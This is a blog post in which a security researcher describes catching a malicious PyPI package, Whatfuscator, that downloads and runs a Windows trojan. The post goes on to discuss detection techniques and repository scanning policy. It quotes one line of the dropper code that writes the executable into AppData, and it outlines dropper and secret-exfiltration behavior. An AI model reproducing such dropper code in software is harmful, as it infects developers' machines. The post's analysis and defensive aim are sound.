Last Friday, I developed a small prototype to get acquainted with Go and experiment with some real-time package repository feeds to detect risky packages quickly.
Happy with my humble progress on Go programming, I started a container in the evening to collect some data over the weekend, which could help me evaluate the quality of Endor Labs’ malware detection mechanism.
So far so good, nothing special until now: These days it feels like an army of researchers and startups set out to address software supply chain security - which of course is a great thing.
But after having a quick look at the data produced overnight, I realized on Saturday morning that my program already succeeded in finding a malicious package - after running for just a few hours.
Technically speaking, the malicious package itself is not overly interesting. The Python package Whatfuscator 70, published on Saturday 4h08 GMT, is yet another variation of the pattern used in thousands of previous attacks: Whatfuscator/__init__.py downloads a Windows executable from a hard-coded URL, saves it to a local file and starts it right after.
with open(os.path.join(os.environ["USERPROFILE"], "AppData")+"\\HV9M6B3CC.exe","wb") as f:
Several AV vendors flag HV9M6B3CC.exe as a Trojan, and having a closer look at it made me realize that I probably found another instance of the attack reported by JFrog on December 13, 2022.
Two other versions, 6.9 and 69, were published just a few minutes before. Apparently, between version 69 and 70, the obfuscated Python code contained in __init__.py has been moved to the Windows executable (a file created with PyInstaller). This code in version 69 uses obfuscation and compression to hide a low-level Python code object.
I reported the package to PyPI administrators in the very same morning and it will hopefully be yanked soon. So far, according to PyPI Stats, the package has only been downloaded a few dozen times.
Malicious packages came to stay
Far more interesting is that attackers do not seem to bother improving the initial infection logic, i.e. this Python 3-liner downloading and running the second stage payload. For years and years, they reuse the same code snippet, sometimes adding simple encoding or encryption schemes for superficial obfuscation. The Backstabber’s Knife Collection contains hundreds of such examples, typically delivered to victim developers by creating name confusion with legitimate packages, which is one of the most-used attack vectors.
And that’s because they do not need to improve: The cost of creating and publishing such a malicious package is so marginal, that a few successful infections already pay the bill. Current campaigns comprise thousands of packages, created and published automatically. In some sense, this is very similar to spam emails: Sent in bulk to thousands of recipients, it suffices that a few people fall victim.
And as for spam, developers need to accept that attackers will continue publishing such malicious packages, hoping that they got past our detection mechanisms - even if it is only for a few hours.
Building blocks for detection mechanisms
Another take-away, the good news, is that it is relatively straight-forward to develop detection tools for malicious packages - at least when it comes to attacks that leverage off-the-shelf code snippets as in the case of Whatfuscator. The building blocks are all there.
Several package repositories offer news feeds to learn about new package releases being published, e.g., PyPI or Packagist. And a great number of other open source projects make it possible to analyze source and compiled code, e.g., to build abstract syntax trees, construct call graphs or track dataflows.
Dataflow analysis, in particular, helps identify behavior that is commonly executed by malicious packages. The logic of a dropper, for example, consists of downloading executables from an external website, often specified using a string literal, saving it to disk and executing it afterwards. Malicious packages aiming to exfiltrate secrets, for example, collect sensitive information such as environment variables or ssh keys and upload it to external websites - again specified using string literals. Sometimes, such behavior is implemented using the programming language’s respective API, and other times via (shell) scripts executed dynamically, e.g., using script engines or operating system interfaces such as os.system in Python or ProcessBuilder in Java.
The trick, of course, is to optimize and balance the false-positive and false-negative detection rates. In this regard, interviews conducted by Ly et al. with PyPI administrators showed that a low false-positive rate (i.e., only few benign packages are wrongly classified as malicious) is more important than a low false-negative rate (i.e., only few malicious packages are missed).
And why not “spamck folders”?
But the detection mechanisms will never be perfect. Just as for spam filters, chances are that benign emails end up in your spam folder (false-positives), and that malicious emails end up in your regular inbox (false-negatives). Spinning this analogy further, one compromise could be to create a spam folder or tag that highlights whether a given package was flagged as suspicious by a malware detection mechanism. Users can decide whether to consume packages from such a folder, and project maintainers can - if they care - object to wrong classifications. Just like it happens day-in day-out for emails.
Such classifications already exist in open source ecosystems, but rather to reflect project maturity than maliciousness, e.g., Linux package repositories or Maven snapshot vs. release repositories.
Scan before publication
Today, many of the malicious packages are found by parties other than the package repository owners, by scanning the artifacts after they have been published. Obviously, to further reduce the exposure of developers to malicious packages, it would be advisable if the public package repositories conduct malware scans prior to publication, and filter malicious packages before they become available to downstream users.
Some repositories already perform security scans, but the breadth and depth of such checks varies from one ecosystem to the other. Non-commercial platforms such as PyPI, for instance, have only limited resources, thus, largely depend on community contributions. In the case of PyPI, only the file setup.py is checked for malicious code patterns, while all the other files are not looked at. The verdicts created by the PyPI checks are reviewed on a regular basis by PyPI administrators, which remove malicious packages where necessary.
This is an opportunity for commercial vendors to create dedicated repositories containing vetted packages. Assured OSS from Google is one such example, which makes several hundred open source components, used internally by Google, also available to other software development organizations - built from the source code and security tested. Another example are binary repositories that run within the premises of development organizations. They mirror pre-built packages hosted by public repositories such as PyPI, which provides the opportunity for software development organizations to integrate custom security workflows into the consumption process. Of course, just mirroring public repositories without any security filters or reviews does not protect against name confusion attacks (because the malicious package would be mirrored as every other benign package before being downloaded to developer workstations or build systems).
However, all those 3rd-party solutions are only effective if local developer clients are properly configured. So far, package managers like Maven and pip refer by default to public repositories, which will probably not change in the foreseeable future. Also, the setup and operation of private repositories requires non-negligible effort. In other words, open source based software development that is secure-by-default requires the integration of advanced malware detection mechanisms into public repositories.
To conclude, while being happy about my Go program and the detection capability of the components under test, what worries me more than malware variants like Whatfuscator are more sophisticated attacks. Ones that do not contain “active malicious code” like droppers or reverse shells, but alter the application logic of an existing, legitimate package, e.g., by modifying authorization checks or input sanitization.
Technically, such attacks can hardly be distinguished from accidental vulnerabilities introduced by benign developers. This makes it much easier for attackers to deny any malicious intent, and the detection of such attacks requires looking more at context information, e.g., whether a given individual already has a history of contributing to a component or project, at what time of the day or week such contributions are typically done, etc.
But seeing that startups, open source communities and regulatory bodies have woken up and are investing significant resources, I am pretty confident that we will also catch those eventually as well…
Reviewing Malware with LLMs: OpenAI vs. Vertex AI
At Endor Labs, we continue evaluating the use of large language models (LLMs) for all kinds of use-cases related to application security. And we continue to be amazed about high-quality responses … until we’re amused about the next laughably wrong answer.